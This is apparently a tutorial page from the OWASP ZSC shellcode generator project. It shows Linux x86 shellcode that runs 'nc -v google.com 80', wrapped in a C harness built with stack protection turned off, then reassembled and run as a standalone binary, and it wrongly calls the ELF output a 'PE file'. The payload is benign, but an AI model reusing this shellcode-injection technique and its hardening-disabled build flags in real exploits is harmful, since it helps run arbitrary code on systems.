OWASP ZSC | OWASP ZCR Shellcoder

Welcome To OWASP ZeroDay Cyber Research Shellcoder Home

Generate PE File With OWASP ZSC Shellcodes

As We know, Shellcodes have much different usages, such as Exploit and Malwares development process, and etc. But there is a question, Could we compile the Shellcodes [Assembly Codes] and run them without inject inside an other process or file? Of course! Shellcodes are bunch of assembly codes with removed null codes or make it injectable in to a process.

OWASP ZSC let us to have disassembly codes inside generated file. It could be used for compiling a sing file. Take a look at a shellcode which generated by OWASP ZSC.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#include <stdio.h>
#include <string.h>
/*
This shellcode generated by ZCR Shellcoder [zsc] http://zsc.z3r0d4y.com/
Title: system('nc[space]-v[space]google.com[space]80')
OS: linux_x86
Encode: none
Length: 74

shellcode.c:     file format elf32-i386

Disassembly of section .text:
00000000 <.text>:
   0:  6a 0b                   push   $0xb
   2:  58                      pop    %eax
   3:  99                      cltd   
   4:  52                      push   %edx
   5:  68 90 20 38 30          push   $0x30382090
   a:  59                      pop    %ecx
   b:  c1 e9 08                shr    $0x8,%ecx
   e:  51                      push   %ecx
   f:  68 2e 63 6f 6d          push   $0x6d6f632e
  14:  68 6f 67 6c 65          push   $0x656c676f
  19:  68 76 20 67 6f          push   $0x6f672076
  1e:  68 6e 63 20 2d          push   $0x2d20636e
  23:  89 e6                   mov    %esp,%esi
  25:  52                      push   %edx
  26:  68 90 90 2d 63          push   $0x632d9090
  2b:  59                      pop    %ecx
  2c:  c1 e9 10                shr    $0x10,%ecx
  2f:  51                      push   %ecx
  30:  89 e1                   mov    %esp,%ecx
  32:  52                      push   %edx
  33:  6a 68                   push   $0x68
  35:  68 2f 62 61 73          push   $0x7361622f
  3a:  68 2f 62 69 6e          push   $0x6e69622f
  3f:  89 e3                   mov    %esp,%ebx
  41:  52                      push   %edx
  42:  57                      push   %edi
  43:  56                      push   %esi
  44:  51                      push   %ecx
  45:  53                      push   %ebx
  46:  89 e1                   mov    %esp,%ecx
  48:  cd 80                   int    $0x80



compile example: gcc -ggdb -static -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o shellcode_compiled shellcode.c
*/
 
int main(){
unsigned char shellcode[]= "\x6a\x0b\x58\x99\x52\x68\x90\x20\x38\x30\x59\xc1\xe9\x08\x51\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x76\x20\x67\x6f\x68\x6e\x63\x20\x2d\x89\xe6\x52\x68\x90\x90\x2d\x63\x59\xc1\xe9\x10\x51\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
    (*(void(*)()) shellcode)();
}

Our shellcode built for linux_x86 OS that will execute “nc -v google.com 80” command, And as we can see, we have disassembled code in the comment of C file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
Disassembly of section .text:
00000000 <.text>:
   0:    6a 0b                   push   $0xb
   2:    58                      pop    %eax
   3:    99                      cltd
   4:    52                      push   %edx
   5:    68 90 20 38 30          push   $0x30382090
   a:    59                      pop    %ecx
   b:    c1 e9 08                shr    $0x8,%ecx
   e:    51                      push   %ecx
   f:    68 2e 63 6f 6d          push   $0x6d6f632e
  14:    68 6f 67 6c 65          push   $0x656c676f
  19:    68 76 20 67 6f          push   $0x6f672076
  1e:    68 6e 63 20 2d          push   $0x2d20636e
  23:    89 e6                   mov    %esp,%esi
  25:    52                      push   %edx
  26:    68 90 90 2d 63          push   $0x632d9090
  2b:    59                      pop    %ecx
  2c:    c1 e9 10                shr    $0x10,%ecx
  2f:    51                      push   %ecx
  30:    89 e1                   mov    %esp,%ecx
  32:    52                      push   %edx
  33:    6a 68                   push   $0x68
  35:    68 2f 62 61 73          push   $0x7361622f
  3a:    68 2f 62 69 6e          push   $0x6e69622f
  3f:    89 e3                   mov    %esp,%ebx
  41:    52                      push   %edx
  42:    57                      push   %edi
  43:    56                      push   %esi
  44:    51                      push   %ecx
  45:    53                      push   %ebx
  46:    89 e1                   mov    %esp,%ecx
  48:    cd 80                   int    $0x80

And now all we need is spliting the compiled assembly opcodes.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
push   $0xb
pop    %eax
cltd
push   %edx
push   $0x30382090
pop    %ecx
shr    $0x8,%ecx
push   %ecx
push   $0x6d6f632e
push   $0x656c676f
push   $0x6f672076
push   $0x2d20636e
mov    %esp,%esi
push   %edx
push   $0x632d9090
pop    %ecx
shr    $0x10,%ecx
push   %ecx
mov    %esp,%ecx
push   %edx
push   $0x68
push   $0x7361622f
push   $0x6e69622f
mov    %esp,%ebx
push   %edx
push   %edi
push   %esi
push   %ecx
push   %ebx
mov    %esp,%ecx
int    $0x80


We have to save these codes inside a file and compile it. Then we have the PE file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
[email protected]:/# cat shellcode.asm
push   $0xb
pop    %eax
cltd
push   %edx
push   $0x30382090
pop    %ecx
shr    $0x8,%ecx
push   %ecx
push   $0x6d6f632e
push   $0x656c676f
push   $0x6f672076
push   $0x2d20636e
mov    %esp,%esi
push   %edx
push   $0x632d9090
pop    %ecx
shr    $0x10,%ecx
push   %ecx
mov    %esp,%ecx
push   %edx
push   $0x68
push   $0x7361622f
push   $0x6e69622f
mov    %esp,%ebx
push   %edx
push   %edi
push   %esi
push   %ecx
push   %ebx
mov    %esp,%ecx
int    $0x80

[email protected]:/# as shellcode.asm -o shellcode.o
[email protected]:/# ld shellcode.o -o shellcode
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048054
[email protected]:/# ./shellcode 
DNS fwd/rev mismatch: google.com != lga15s46-in-f7.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f5.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f8.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f0.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f9.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f1.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f4.1e100.net
DNS fwd/rev mismatch: google.com != lga15s46-in-f2.1e100.net
google.com [173.194.123.7] 80 (http) open


References

ZeroDay Cyber Research
ZSC Home
OWASP Page
Ali Razmjoo